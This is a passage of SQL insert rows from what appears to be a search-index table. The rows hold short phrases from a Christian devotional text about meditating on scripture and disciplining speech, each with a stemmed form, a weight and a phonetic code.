(292638, 'and memorize it', 'and memorize it', 0, 1, 1.5, 'A535623', 1, '*'),
(292639, 'and protect', 'and protect', 0, 1, 1.3667, 'A5316323', 1, '*'),
(292640, 'and protect your', 'and protect your', 0, 1, 1.5333, 'A53163236', 1, '*'),
(292641, 'and start a', 'and start a', 0, 1, 1.3667, 'A532363', 1, '*'),
(292642, 'and store', 'and store', 0, 1, 1.3, 'A53236', 1, '*'),
(292643, 'and store them', 'and store them', 0, 1, 1.4667, 'A5323635', 1, '*'),
(292644, 'and trying', 'and trying', 0, 1, 1.3333, 'A53652', 1, '*'),
(292645, 'and trying to', 'and trying to', 0, 1, 1.4333, 'A536523', 1, '*'),
(292646, 'and when there', 'and when there', 0, 1, 1.4667, 'A53536', 1, '*'),
(292647, 'anything outside the', 'anyth outside the', 0, 1, 1.6667, 'A5352323', 1, '*'),
(292648, 'apart', 'apart', 0, 0, 0.3333, 'A163', 2, '*'),
(292649, 'apart from', 'apart from', 0, 1, 1.3333, 'A163165', 2, '*'),
(292650, 'apart from the', 'apart from the', 0, 1, 1.4667, 'A1631653', 1, '*'),
(292651, 'are able', 'ar able', 0, 1, 1.2667, 'A614', 1, '*'),
(292652, 'are able to', 'ar able to', 0, 1, 1.3667, 'A6143', 1, '*'),
(292653, 'are hanging', 'ar hanging', 0, 1, 1.3667, 'A65252', 1, '*'),
(292654, 'are hanging out', 'ar hanging out', 0, 1, 1.5, 'A652523', 1, '*'),
(292655, 'are looking', 'ar looking', 0, 1, 1.3667, 'A64252', 1, '*'),
(292656, 'are looking around', 'ar looking around', 0, 1, 1.6, 'A64252653', 1, '*'),
(292657, 'around and', 'around and', 0, 1, 1.3333, 'A65353', 1, '*'),
(292658, 'around and trying', 'around and trying', 0, 1, 1.5667, 'A65353652', 1, '*'),
(292659, 'at the dream', 'at the dream', 0, 1, 1.4, 'A365', 1, '*'),
(292660, 'attack what', 'attack what', 0, 1, 1.3667, 'A323', 1, '*'),
(292661, 'attack what is', 'attack what is', 0, 1, 1.4667, 'A3232', 1, '*'),
(292662, 'bank', 'bank', 0, 0, 0.2667, 'B520', 2, '*'),
(292663, 'bank now', 'bank now', 0, 1, 1.2667, 'B525', 1, '*'),
(292664, 'bank now till', 'bank now till', 0, 1, 1.4333, 'B52534', 1, '*'),
(292665, 'be bold', 'be bold', 0, 1, 1.2333, 'B430', 1, '*'),
(292666, 'be bold to', 'be bold to', 0, 1, 1.3333, 'B430', 1, '*'),
(292667, 'be consistent', 'be consistent', 0, 1, 1.4333, 'B252353', 1, '*'),
(292668, 'be consistent until', 'be consistent until', 0, 1, 1.6333, 'B252353534', 1, '*'),
(292669, 'be word-controlled', 'be word-controlled', 0, 1, 1.6, 'B63253643', 1, '*'),
(292670, 'be word-controlled this', 'be word-controlled this', 0, 1, 1.7667, 'B632536432', 1, '*'),
(292671, 'becomes easier', 'becom easier', 0, 1, 1.4667, 'B2526', 1, '*'),
(292672, 'becomes easier for', 'becom easier for', 0, 1, 1.6, 'B252616', 1, '*'),
(292673, 'before you find', 'befor you find', 0, 1, 1.5, 'B6153', 1, '*'),
(292674, 'begin to accelerate', 'begin to accelerate', 0, 1, 1.6333, 'B2532463', 1, '*'),
(292675, 'begin to meditate', 'begin to meditate', 0, 1, 1.5667, 'B25353', 1, '*'),
(292676, 'believers separate', 'believ separate', 0, 1, 1.6, 'B4162163', 1, '*'),
(292677, 'believers separate from', 'believ separate from', 0, 1, 1.7667, 'B4162163165', 1, '*'),
(292678, 'bible for what', 'bibl for what', 0, 1, 1.4667, 'B4163', 1, '*'),
(292679, 'bible the', 'bibl the', 0, 1, 1.3, 'B430', 1, '*'),
(292680, 'bible the devil', 'bibl the devil', 0, 1, 1.5, 'B4314', 1, '*'),
(292681, 'bold to', 'bold to', 0, 1, 1.2333, 'B430', 1, '*'),
(292682, 'bold to declare', 'bold to declare', 0, 1, 1.5, 'B43246', 1, '*'),
(292683, 'by heart', 'by heart', 0, 1, 1.2667, 'B630', 1, '*'),
(292684, 'by heart 5', 'by heart 5', 0, 1, 1.3333, 'B630', 1, '*'),
(292685, 'by little', 'by little', 0, 1, 1.3, 'B434', 1, '*'),
(292686, 'by little and', 'by little and', 0, 1, 1.4333, 'B43453', 1, '*'),
(292687, 'call people', 'call people', 0, 1, 1.3667, 'C414', 1, '*'),
(292688, 'call people are', 'call people are', 0, 1, 1.5, 'C4146', 1, '*'),
(292689, 'centre some', 'centr some', 0, 1, 1.3667, 'C53625', 1, '*'),
(292690, 'centre some of', 'centr some of', 0, 1, 1.4667, 'C536251', 1, '*'),
(292691, 'centre there', 'centr there', 0, 1, 1.4, 'C53636', 1, '*'),
(292692, 'centre there is', 'centr there is', 0, 1, 1.5, 'C536362', 1, '*'),
(292693, 'church for', 'church for', 0, 1, 1.3333, 'C6216', 1, '*'),
(292694, 'church for what', 'church for what', 0, 1, 1.5, 'C62163', 1, '*'),
(292695, 'church without', 'church without', 0, 1, 1.4667, 'C623', 1, '*'),
(292696, 'church without understanding', 'church without understanding', 0, 1, 1.9333, 'C623536235352', 1, '*'),
(292697, 'come little', 'come little', 0, 1, 1.3667, 'C5434', 1, '*'),
(292698, 'come little by', 'come little by', 0, 1, 1.4667, 'C54341', 1, '*'),
(292699, 'complaints', 'complaint', 0, 0, 0.6667, 'C514532', 1, '*'),
(292700, 'complaints he', 'complaint he', 0, 1, 1.4333, 'C514532', 1, '*'),
(292701, 'complaints he is', 'complaint he is', 0, 1, 1.5333, 'C514532', 1, '*'),
(292702, 'concerning your health', 'concern your health', 0, 1, 1.7333, 'C52652643', 1, '*'),
(292703, 'consistent until', 'consist until', 0, 1, 1.5333, 'C52353534', 1, '*'),
(292704, 'consistent until you', 'consist until you', 0, 1, 1.6667, 'C52353534', 1, '*'),
(292705, 'control', 'control', 0, 0, 0.4667, 'C5364', 1, '*'),
(292706, 'control and', 'control and', 0, 1, 1.3667, 'C536453', 1, '*'),
(292707, 'control and protect', 'control and protect', 0, 1, 1.6333, 'C53645316323', 1, '*'),
(292708, 'declare what', 'declar what', 0, 1, 1.4, 'D2463', 1, '*'),
(292709, 'declare what god', 'declar what god', 0, 1, 1.5333, 'D246323', 1, '*'),
(292710, 'devil is there', 'devil is there', 0, 1, 1.4667, 'D14236', 1, '*'),
(292711, 'discipline you', 'disciplin you', 0, 1, 1.4667, 'D2145', 1, '*'),
(292712, 'discipline you must', 'disciplin you must', 0, 1, 1.6333, 'D214523', 1, '*'),
(292713, 'discipline your mouth', 'disciplin your mouth', 0, 1, 1.7, 'D2145653', 1, '*'),
(292714, 'do meditate', 'do meditate', 0, 1, 1.3667, 'D530', 1, '*'),
(292715, 'do meditate on', 'do meditate on', 0, 1, 1.4667, 'D535', 1, '*'),
(292716, 'don\'t speak', 'don speak', 0, 1, 1.3667, 'D53212', 1, '*'),
(292717, 'don\'t speak in', 'don speak in', 0, 1, 1.4667, 'D532125', 1, '*'),
(292718, 'don\'t wait', 'don wait', 0, 1, 1.3333, 'D530', 1, '*'),
(292719, 'don\'t wait until', 'don wait until', 0, 1, 1.5333, 'D53534', 1, '*'),
(292720, 'dream centre some', 'dream centre some', 0, 1, 1.5667, 'D65253625', 1, '*'),
(292721, 'dream centre there', 'dream centre there', 0, 1, 1.6, 'D65253636', 1, '*'),
(292722, 'e prophecies', 'e prophecies', 0, 1, 1.4, 'E1612', 1, '*'),
(292723, 'e prophecies that', 'e prophecies that', 0, 1, 1.5667, 'E16123', 1, '*'),
(292724, 'easier', 'easier', 0, 0, 0.4, 'E260', 1, '*'),
(292725, 'easier for', 'easier for', 0, 1, 1.3333, 'E2616', 1, '*'),
(292726, 'easier for god', 'easier for god', 0, 1, 1.4667, 'E261623', 1, '*'),
(292727, 'else apart', 'els apart', 0, 1, 1.3333, 'E42163', 1, '*'),
(292728, 'else apart from', 'els apart from', 0, 1, 1.5, 'E42163165', 1, '*'),
(292729, 'else that', 'els that', 0, 1, 1.3, 'E423', 1, '*'),
(292730, 'else that is', 'els that is', 0, 1, 1.4, 'E4232', 1, '*'),
(292731, 'explanations', 'explan', 0, 0, 0.8, 'E2145352', 1, '*'),
(292732, 'explanations about', 'explan about', 0, 1, 1.6, 'E214535213', 1, '*'),
(292733, 'explanations about what', 'explan about what', 0, 1, 1.7667, 'E214535213', 1, '*'),
(292734, 'father\'s heart 22', 'father heart 22', 0, 1, 1.5667, 'F36263', 1, '*'),
(292735, 'fellow believers', 'fellow believers', 0, 1, 1.5333, 'F414162', 1, '*'),
(292736, 'fellow believers separate', 'fellow believers separate', 0, 1, 1.8333, 'F414162163', 1, '*'),
(292737, 'fellowship with the', 'fellowship with the', 0, 1, 1.6333, 'F4213', 1, '*'),
(292738, 'find explanations', 'find explanations', 0, 1, 1.5667, 'F532145352', 1, '*'),
(292739, 'find explanations about', 'find explanations about', 0, 1, 1.7667, 'F53214535213', 1, '*'),
(292740, 'for his words', 'for his words', 0, 1, 1.4333, 'F62632', 1, '*'),
(292741, 'for i will', 'for i will', 0, 1, 1.3333, 'F640', 1, '*'),
(292742, 'for what god', 'for what god', 0, 1, 1.4, 'F6323', 1, '*'),
(292743, 'from people that', 'from people that', 0, 1, 1.5333, 'F65143', 1, '*'),
(292744, 'from the word', 'from the word', 0, 1, 1.4333, 'F65363', 1, '*'),
(292745, 'god 2017 god', 'god 2017 god', 0, 1, 1.4, 'G323', 1, '*'),
(292746, 'god anything', 'god anything', 0, 1, 1.4, 'G35352', 1, '*'),
(292747, 'god anything outside', 'god anything outside', 0, 1, 1.6667, 'G35352323', 1, '*'),
(292748, 'god will do', 'god will do', 0, 1, 1.3667, 'G343', 1, '*'),
(292749, 'god\'s call people', 'god call people', 0, 1, 1.5667, 'G32414', 1, '*'),
(292750, 'hanging out', 'hang out', 0, 1, 1.3667, 'H52523', 1, '*'),
(292751, 'hanging out in', 'hang out in', 0, 1, 1.4667, 'H525235', 1, '*'),
(292752, 'happen god', 'happen god', 0, 1, 1.3333, 'H1523', 1, '*'),
(292753, 'happen god is', 'happen god is', 0, 1, 1.4333, 'H15232', 1, '*'),
(292754, 'happen in dream', 'happen in dream', 0, 1, 1.5, 'H15365', 1, '*'),
(292755, 'has said 4', 'ha said 4', 0, 1, 1.3333, 'H230', 1, '*'),
(292756, 'has said 7', 'ha said 7', 0, 1, 1.3333, 'H230', 1, '*'),
(292757, 'has said be', 'ha said be', 0, 1, 1.3667, 'H231', 1, '*'),
(292758, 'has said concerning', 'ha said concerning', 0, 1, 1.6333, 'H23252652', 1, '*'),
(292759, 'has said i', 'ha said i', 0, 1, 1.3333, 'H230', 1, '*'),
(292760, 'hast well', 'hast well', 0, 1, 1.3, 'H234', 1, '*'),
(292761, 'hast well seen', 'hast well seen', 0, 1, 1.4667, 'H23425', 1, '*'),
(292762, 'hasten', 'hasten', 0, 0, 0.4, 'H235', 1, '*'),
(292763, 'hasten my', 'hasten my', 0, 1, 1.3, 'H235', 1, '*'),
(292764, 'hasten my word', 'hasten my word', 0, 1, 1.4667, 'H23563', 1, '*'),
(292765, 'he is watching', 'he is watching', 0, 1, 1.4667, 'H23252', 1, '*'),
(292766, 'health build', 'health build', 0, 1, 1.4, 'H43143', 1, '*'),
(292767, 'health build up', 'health build up', 0, 1, 1.5, 'H431431', 1, '*'),
(292768, 'heart 22 01', 'heart 22 01', 0, 1, 1.3667, 'H630', 1, '*'),
(292769, 'heart 5 listen', 'heart 5 listen', 0, 1, 1.4667, 'H634235', 1, '*'),
(292770, 'heart and memorize', 'heart and memorize', 0, 1, 1.6, 'H6353562', 1, '*'),
(292771, 'heart take', 'heart take', 0, 1, 1.3333, 'H632', 1, '*'),
(292772, 'heart take these', 'heart take these', 0, 1, 1.5333, 'H63232', 1, '*'),
(292773, 'heart until', 'heart until', 0, 1, 1.3667, 'H63534', 1, '*'),
(292774, 'heart until you', 'heart until you', 0, 1, 1.5, 'H63534', 1, '*'),
(292775, 'heat', 'heat', 0, 0, 0.2667, 'H300', 2, '*'),
(292776, 'heat of', 'heat of', 0, 1, 1.2333, 'H310', 2, '*'),
(292777, 'heat of negative', 'heat of negative', 0, 1, 1.5333, 'H315231', 2, '*'),
(292778, 'him once', 'him once', 0, 1, 1.2667, 'H520', 2, '*'),
(292779, 'him once you', 'him once you', 0, 1, 1.4, 'H520', 2, '*'),
(292780, 'his words jeremiah', 'hi words jeremiah', 0, 1, 1.6, 'H263265', 1, '*'),
(292781, 'his words some', 'hi words some', 0, 1, 1.4667, 'H26325', 1, '*'),
(292782, 'i e prophecies', 'i e prophecies', 0, 1, 1.4667, 'I1612', 1, '*'),
(292783, 'i will hasten', 'i will hasten', 0, 1, 1.4333, 'I4235', 1, '*'),
(292784, 'in church for', 'in church for', 0, 1, 1.4333, 'I526216', 1, '*'),
(292785, 'in church without', 'in church without', 0, 1, 1.5667, 'I52623', 1, '*'),
(292786, 'in the heat', 'in the heat', 0, 1, 1.3667, 'I530', 2, '*'),
(292787, 'in your walk', 'in your walk', 0, 1, 1.4, 'I5642', 1, '*'),
(292788, 'is a sickness', 'is a sickness', 0, 1, 1.4333, 'I252', 1, '*'),
(292789, 'is getting', 'is getting', 0, 1, 1.3333, 'I2352', 1, '*'),
(292790, 'is getting better', 'is getting better', 0, 1, 1.5667, 'I2352136', 1, '*'),
(292791, 'is making', 'is making', 0, 1, 1.3, 'I25252', 1, '*'),
(292792, 'is making things', 'is making things', 0, 1, 1.5333, 'I25252352', 1, '*'),
(292793, 'is no pressure', 'is no pressure', 0, 1, 1.4667, 'I251626', 1, '*'),
(292794, 'is not too', 'is not too', 0, 1, 1.3333, 'I253', 1, '*'),
(292795, 'is not watching', 'is not watching', 0, 1, 1.5, 'I253252', 1, '*'),
(292796, 'is nothing', 'is nothing', 0, 1, 1.3333, 'I25352', 1, '*'),
(292797, 'is nothing else', 'is nothing else', 0, 1, 1.5, 'I2535242', 1, '*'),
(292798, 'is saying god', 'is saying god', 0, 1, 1.4333, 'I2523', 1, '*'),
(292799, 'is something else', 'is something else', 0, 1, 1.5667, 'I2535242', 1, '*'),
(292800, 'is there 3', 'is there 3', 0, 1, 1.3333, 'I236', 1, '*'),
(292801, 'is watching', 'is watching', 0, 1, 1.3667, 'I23252', 2, '*'),
(292802, 'is watching for', 'is watching for', 0, 1, 1.5, 'I2325216', 1, '*'),
(292803, 'it 6', 'it 6', 0, 1, 1.1333, 'I300', 1, '*'),
(292804, 'it 6 don\'t', 'it 6 don', 0, 1, 1.3333, 'I353', 1, '*'),
(292805, 'it becomes', 'it becomes', 0, 1, 1.3333, 'I31252', 1, '*'),
(292806, 'it becomes easier', 'it becomes easier', 0, 1, 1.5667, 'I312526', 1, '*'),
(292807, 'it in your', 'it in your', 0, 1, 1.3333, 'I356', 1, '*'),
(292808, 'it right in', 'it right in', 0, 1, 1.3667, 'I36235', 1, '*'),
(292809, 'it right it', 'it right it', 0, 1, 1.3667, 'I3623', 1, '*'),
(292810, 'it right so', 'it right so', 0, 1, 1.3667, 'I36232', 1, '*'),
(292811, 'it store', 'it store', 0, 1, 1.2667, 'I3236', 1, '*'),
(292812, 'it store it', 'it store it', 0, 1, 1.3667, 'I32363', 1, '*'),
(292813, 'it will begin', 'it will begin', 0, 1, 1.4333, 'I34125', 1, '*'),
(292814, 'it.”', 'it.”', 0, 0, 0.2667, 'I300', 1, '*'),
(292815, 'it.” 2', 'it.” 2', 0, 1, 1.2, 'I300', 1, '*'),
(292816, 'it.” 2 watch', 'it.” 2 watch', 0, 1, 1.4, 'I320', 1, '*'),
(292817, 'item 18', 'item 18', 0, 1, 1.2333, 'I350', 1, '*'),
(292818, 'item 18 from', 'item 18 from', 0, 1, 1.4, 'I35165', 1, '*'),
(292819, 'jeremiah 1', 'jeremiah 1', 0, 1, 1.3333, 'J650', 1, '*'),
(292820, 'jeremiah 1 verse', 'jeremiah 1 verse', 0, 1, 1.5333, 'J65162', 1, '*'),
(292821, 'joke this', 'joke this', 0, 1, 1.3, 'J320', 1, '*'),
(292822, 'joke this is', 'joke this is', 0, 1, 1.4, 'J320', 1, '*'),
(292823, 'k2 item 18', 'k2 item 18', 0, 1, 1.3333, 'K350', 1, '*'),
(292824, 'keys', 'kei', 0, 0, 0.2667, 'K000', 1, '*'),
(292825, 'keys to', 'kei to', 0, 1, 1.2333, 'K300', 1, '*'),
(292826, 'keys to getting', 'kei to getting', 0, 1, 1.5, 'K32352', 1, '*'),
(292827, 'know them', 'know them', 0, 1, 1.3, 'K535', 1, '*'),
(292828, 'know them by', 'know them by', 0, 1, 1.4, 'K5351', 1, '*'),
(292829, 'late and', 'late and', 0, 1, 1.2667, 'L353', 1, '*'),
(292830, 'late and when', 'late and when', 0, 1, 1.4333, 'L3535', 1, '*'),
(292831, 'learn to control', 'learn to control', 0, 1, 1.5333, 'L65325364', 1, '*'),
(292832, 'let me show', 'let me show', 0, 1, 1.3667, 'L352', 1, '*'),
(292833, 'listen well', 'listen well', 0, 1, 1.3667, 'L2354', 1, '*'),
(292834, 'listen well in', 'listen well in', 0, 1, 1.4667, 'L23545', 1, '*'),
(292835, 'little and', 'littl and', 0, 1, 1.3333, 'L3453', 1, '*'),
(292836, 'little and it', 'littl and it', 0, 1, 1.4333, 'L3453', 1, '*'),
(292837, 'little by', 'littl by', 0, 1, 1.3, 'L341', 1, '*'),
(292838, 'little by little', 'littl by little', 0, 1, 1.5333, 'L341434', 1, '*'),
(292839, 'looking around', 'look around', 0, 1, 1.4667, 'L252653', 1, '*'),
(292840, 'looking around and', 'look around and', 0, 1, 1.6, 'L25265353', 1, '*'),
(292841, 'lord unto', 'lord unto', 0, 1, 1.3, 'L6353', 1, '*'),
(292842, 'lord unto me', 'lord unto me', 0, 1, 1.4, 'L63535', 1, '*'),
(292843, 'maintain fellowship', 'maintain fellowship', 0, 1, 1.6333, 'M351421', 1, '*'),
(292844, 'maintain fellowship with', 'maintain fellowship with', 0, 1, 1.8, 'M3514213', 1, '*'),
(292845, 'make things', 'make things', 0, 1, 1.3667, 'M2352', 1, '*'),
(292846, 'make things happen', 'make things happen', 0, 1, 1.6, 'M235215', 1, '*'),
(292847, 'making things', 'make things', 0, 1, 1.4333, 'M252352', 1, '*'),
(292848, 'making things happen', 'make things happen', 0, 1, 1.6667, 'M25235215', 1, '*'),
(292849, 'making things work', 'make things work', 0, 1, 1.6, 'M25235262', 1, '*'),
(292850, 'me show', 'me show', 0, 1, 1.2333, 'M200', 1, '*'),
(292851, 'me show you', 'me show you', 0, 1, 1.3667, 'M200', 1, '*'),
(292852, 'me thou', 'me thou', 0, 1, 1.2333, 'M300', 1, '*'),
(292853, 'me thou hast', 'me thou hast', 0, 1, 1.4, 'M323', 1, '*'),
(292854, 'meditate on it', 'medit on it', 0, 1, 1.4667, 'M353', 1, '*'),
(292855, 'meditate upon', 'medit upon', 0, 1, 1.4333, 'M315', 1, '*'),
(292856, 'meditate upon them', 'medit upon them', 0, 1, 1.6, 'M31535', 1, '*'),
(292857, 'memorize', 'memor', 0, 0, 0.5333, 'M620', 1, '*'),
(292858, 'memorize it', 'memor it', 0, 1, 1.3667, 'M623', 1, '*'),
(292859, 'memorize it 6', 'memor it 6', 0, 1, 1.4333, 'M623', 1, '*'),
(292860, 'memorize them', 'memor them', 0, 1, 1.4333, 'M6235', 1, '*'),
(292861, 'memorize them and', 'memor them and', 0, 1, 1.5667, 'M62353', 1, '*'),
(292862, 'mouth learn', 'mouth learn', 0, 1, 1.3667, 'M3465', 1, '*'),
(292863, 'mouth learn to', 'mouth learn to', 0, 1, 1.4667, 'M34653', 1, '*'),
(292864, 'mouth must', 'mouth must', 0, 1, 1.3333, 'M3523', 1, '*'),
(292865, 'mouth must be', 'mouth must be', 0, 1, 1.4333, 'M35231', 1, '*'),
(292866, 'mouth to', 'mouth to', 0, 1, 1.2667, 'M300', 1, '*'),
(292867, 'mouth to say', 'mouth to say', 0, 1, 1.4, 'M320', 1, '*'),
(292868, 'mouth to speak', 'mouth to speak', 0, 1, 1.4667, 'M3212', 1, '*'),
(292869, 'mouth your', 'mouth your', 0, 1, 1.3333, 'M360', 1, '*'),
(292870, 'mouth your mouth', 'mouth your mouth', 0, 1, 1.5333, 'M3653', 1, '*'),
(292871, 'must be word-controlled', 'must be word-controlled', 0, 1, 1.7667, 'M23163253643', 1, '*'),
(292872, 'must discipline', 'must discipline', 0, 1, 1.5, 'M232145', 1, '*'),
(292873, 'must discipline your', 'must discipline your', 0, 1, 1.6667, 'M2321456', 1, '*'),
(292874, 'my word', 'my word', 0, 1, 1.2333, 'M630', 1, '*'),
(292875, 'my word to', 'my word to', 0, 1, 1.3333, 'M630', 1, '*'),
(292876, 'negative passion discipline', 'neg passion discipline', 0, 1, 1.9, 'N2312532145', 1, '*'),
(292877, 'next stage', 'next stage', 0, 1, 1.3333, 'N23232', 1, '*'),
(292878, 'next stage which', 'next stage which', 0, 1, 1.5333, 'N23232', 1, '*'),
(292879, 'no pressure', 'no pressure', 0, 1, 1.3667, 'N1626', 1, '*'),
(292880, 'no pressure don\'t', 'no pressure don', 0, 1, 1.5667, 'N1626353', 1, '*'),
(292881, 'not a joke', 'not a joke', 0, 1, 1.3333, 'N320', 1, '*'),
(292882, 'not too', 'not too', 0, 1, 1.2333, 'N300', 1, '*'),
(292883, 'not too late', 'not too late', 0, 1, 1.4, 'N343', 1, '*'),
(292884, 'not watching', 'not watching', 0, 1, 1.4, 'N3252', 1, '*'),
(292885, 'not watching your', 'not watching your', 0, 1, 1.5667, 'N32526', 1, '*'),
(292886, 'nothing else', 'noth else', 0, 1, 1.4, 'N35242', 1, '*'),
(292887, 'nothing else apart', 'noth else apart', 0, 1, 1.6, 'N35242163', 1, '*'),
(292888, 'now till', 'now till', 0, 1, 1.2667, 'N340', 1, '*'),
(292889, 'now till next', 'now till next', 0, 1, 1.4333, 'N34523', 1, '*'),
(292890, 'now when it', 'now when it', 0, 1, 1.3667, 'N300', 1, '*'),
(292891, 'of god 2017', 'of god 2017', 0, 1, 1.3667, 'O123', 1, '*'),
(292892, 'of god anything', 'of god anything', 0, 1, 1.5, 'O1235352', 1, '*'),
(292893, 'of negative passion', 'of negative passion', 0, 1, 1.6333, 'O1523125', 2, '*'),
(292894, 'on it store', 'on it store', 0, 1, 1.3667, 'O53236', 1, '*'),
(292895, 'only what god', 'onli what god', 0, 1, 1.4333, 'O54323', 1, '*'),
(292896, 'only work', 'onli work', 0, 1, 1.3, 'O5462', 1, '*'),
(292897, 'only work with', 'onli work with', 0, 1, 1.4667, 'O54623', 1, '*'),
(292898, 'out in church', 'out in church', 0, 1, 1.4333, 'O35262', 1, '*'),
(292899, 'out what god', 'out what god', 0, 1, 1.4, 'O323', 1, '*'),
(292900, 'outside the', 'outsid the', 0, 1, 1.3667, 'O323', 1, '*'),
(292901, 'outside the bible', 'outsid the bible', 0, 1, 1.5667, 'O32314', 1, '*'),
(292902, 'passion discipline', 'passion discipline', 0, 1, 1.6, 'P2532145', 1, '*'),
(292903, 'passion discipline your', 'passion discipline your', 0, 1, 1.7667, 'P25321456', 1, '*'),
(292904, 'pastors think', 'pastor think', 0, 1, 1.4333, 'P2362352', 1, '*'),
(292905, 'pastors think that', 'pastor think that', 0, 1, 1.6, 'P23623523', 1, '*'),
(292906, 'people are looking', 'peopl are looking', 0, 1, 1.6, 'P464252', 1, '*'),
(292907, 'perform', 'perform', 0, 0, 0.4667, 'P6165', 1, '*'),
(292908, 'perform it.”', 'perform it.”', 0, 1, 1.4, 'P61653', 1, '*'),
(292909, 'perform it.” 2', 'perform it.” 2', 0, 1, 1.4667, 'P61653', 1, '*'),
(292910, 'points and', 'point and', 0, 1, 1.3333, 'P53253', 1, '*'),
(292911, 'points and start', 'point and start', 0, 1, 1.5333, 'P532532363', 1, '*'),
(292912, 'pressure don\'t', 'pressur don', 0, 1, 1.4667, 'P626353', 1, '*'),
(292913, 'pressure don\'t wait', 'pressur don wait', 0, 1, 1.6333, 'P626353', 1, '*'),
(292914, 'program now', 'program now', 0, 1, 1.3667, 'P6265', 1, '*'),
(292915, 'program now when', 'program now when', 0, 1, 1.5333, 'P6265', 1, '*'),
(292916, 'progress to', 'progress to', 0, 1, 1.3667, 'P62623', 1, '*'),
(292917, 'progress to the', 'progress to the', 0, 1, 1.5, 'P62623', 1, '*'),
(292918, 'protect your mouth', 'protect your mouth', 0, 1, 1.6, 'P6323653', 1, '*'),
(292919, 'result result', 'result result', 0, 1, 1.4333, 'R2436243', 1, '*'),
(292920, 'result result will', 'result result will', 0, 1, 1.6, 'R24362434', 1, '*'),
(292921, 'result will', 'result will', 0, 1, 1.3667, 'R2434', 1, '*'),
(292922, 'result will come', 'result will come', 0, 1, 1.5333, 'R243425', 1, '*'),
(292923, 'right in your', 'right in your', 0, 1, 1.4333, 'R2356', 1, '*'),
(292924, 'right it', 'right it', 0, 1, 1.2667, 'R230', 1, '*'),
(292925, 'right it becomes', 'right it becomes', 0, 1, 1.5333, 'R231252', 1, '*'),
(292926, 'right so', 'right so', 0, 1, 1.2667, 'R232', 1, '*'),
(292927, 'right so that', 'right so that', 0, 1, 1.4333, 'R2323', 1, '*'),
(292928, 'said 4', 'said 4', 0, 1, 1.2, 'S300', 1, '*'),
(292929, 'said 4 begin', 'said 4 begin', 0, 1, 1.4, 'S3125', 1, '*'),
(292930, 'said 7', 'said 7', 0, 1, 1.2, 'S300', 1, '*'),
(292931, 'said 7 maintain', 'said 7 maintain', 0, 1, 1.5, 'S3535', 1, '*'),
(292932, 'said be', 'said be', 0, 1, 1.2333, 'S310', 1, '*'),
(292933, 'said be consistent', 'said be consistent', 0, 1, 1.6, 'S31252353', 1, '*'),
(292934, 'said concerning', 'said concerning', 0, 1, 1.5, 'S3252652', 1, '*'),
(292935, 'said concerning your', 'said concerning your', 0, 1, 1.6667, 'S32526526', 1, '*'),
(292936, 'said i e', 'said i e', 0, 1, 1.2667, 'S300', 1, '*'),
(292937, 'say what', 'sai what', 0, 1, 1.2667, 'S300', 1, '*'),
(292938, 'say what god', 'sai what god', 0, 1, 1.4, 'S323', 1, '*'),
(292939, 'saying god', 'sai god', 0, 1, 1.3333, 'S523', 1, '*'),
(292940, 'saying god will', 'sai god will', 0, 1, 1.5, 'S5234', 1, '*'),
(292941, 'says then', 'sai then', 0, 1, 1.3, 'S350', 1, '*'),
(292942, 'says then said', 'sai then said', 0, 1, 1.4667, 'S3523', 1, '*'),
(292943, 'search', 'search', 0, 0, 0.4, 'S620', 1, '*'),
(292944, 'search the', 'search the', 0, 1, 1.3333, 'S623', 1, '*'),
(292945, 'search the bible', 'search the bible', 0, 1, 1.5333, 'S62314', 1, '*'),
(292946, 'see result', 'see result', 0, 1, 1.3333, 'S6243', 1, '*'),
(292947, 'see result result', 'see result result', 0, 1, 1.5667, 'S62436243', 1, '*'),
(292948, 'seen for', 'seen for', 0, 1, 1.2667, 'S516', 1, '*'),
(292949, 'seen for i', 'seen for i', 0, 1, 1.3333, 'S516', 1, '*'),
(292950, 'separate from', 'separ from', 0, 1, 1.4333, 'S163165', 1, '*'),
(292951, 'separate from people', 'separ from people', 0, 1, 1.6667, 'S16316514', 1, '*'),
(292952, 'show you', 'show you', 0, 1, 1.2667, 'S000', 2, '*'),
(292953, 'show you some', 'show you some', 0, 1, 1.4333, 'S500', 1, '*'),
(292954, 'sickness before', 'sick before', 0, 1, 1.5, 'S5216', 1, '*'),
(292955, 'sickness before you', 'sick before you', 0, 1, 1.6333, 'S5216', 1, '*'),
(292956, 'some keys', 'some keys', 0, 1, 1.3, 'S520', 1, '*'),
(292957, 'some keys to', 'some keys to', 0, 1, 1.4, 'S523', 1, '*'),
(292958, 'some pastors', 'some pastors', 0, 1, 1.4, 'S512362', 1, '*'),
(292959, 'some pastors think', 'some pastors think', 0, 1, 1.6, 'S512362352', 1, '*'),
(292960, 'something else', 'someth else', 0, 1, 1.4667, 'S535242', 1, '*'),
(292961, 'something else that', 'someth else that', 0, 1, 1.6333, 'S5352423', 1, '*'),
(292962, 'speak in the', 'speak in the', 0, 1, 1.4, 'S1253', 2, '*'),
(292963, 'speak only', 'speak only', 0, 1, 1.3333, 'S1254', 1, '*'),
(292964, 'speak only what', 'speak only what', 0, 1, 1.5, 'S12543', 1, '*'),
(292965, 'spirit and fellow', 'spirit and fellow', 0, 1, 1.5667, 'S1635314', 1, '*'),
(292966, 'stage which', 'stage which', 0, 1, 1.3667, 'S320', 1, '*'),
(292967, 'stage which is', 'stage which is', 0, 1, 1.4667, 'S320', 1, '*'),
(292968, 'start a program', 'start a program', 0, 1, 1.5, 'S36316265', 1, '*'),
(292969, 'store', 'store', 0, 0, 0.3333, 'S360', 1, '*'),
(292970, 'store it', 'store it', 0, 1, 1.2667, 'S363', 1, '*'),
(292971, 'store it in', 'store it in', 0, 1, 1.3667, 'S3635', 1, '*'),
(292972, 'store them', 'store them', 0, 1, 1.3333, 'S3635', 1, '*'),
(292973, 'store them in', 'store them in', 0, 1, 1.4333, 'S3635', 1, '*'),
(292974, 'take these', 'take these', 0, 1, 1.3333, 'T232', 1, '*'),
(292975, 'take these points', 'take these points', 0, 1, 1.5667, 'T2321532', 1, '*'),
(292976, 'that is making', 'that is making', 0, 1, 1.4667, 'T25252', 1, '*'),
(292977, 'that make things', 'that make things', 0, 1, 1.5333, 'T52352', 1, '*'),
(292978, 'that will attack', 'that will attack', 0, 1, 1.5333, 'T432', 1, '*'),
(292979, 'the bible the', 'the bible the', 0, 1, 1.4333, 'T143', 1, '*'),
(292980, 'the heat', 'the heat', 0, 1, 1.2667, 'T000', 2, '*'),
(292981, 'the heat of', 'the heat of', 0, 1, 1.3667, 'T100', 2, '*'),
(292982, 'the lord unto', 'the lord unto', 0, 1, 1.4333, 'T46353', 1, '*'),
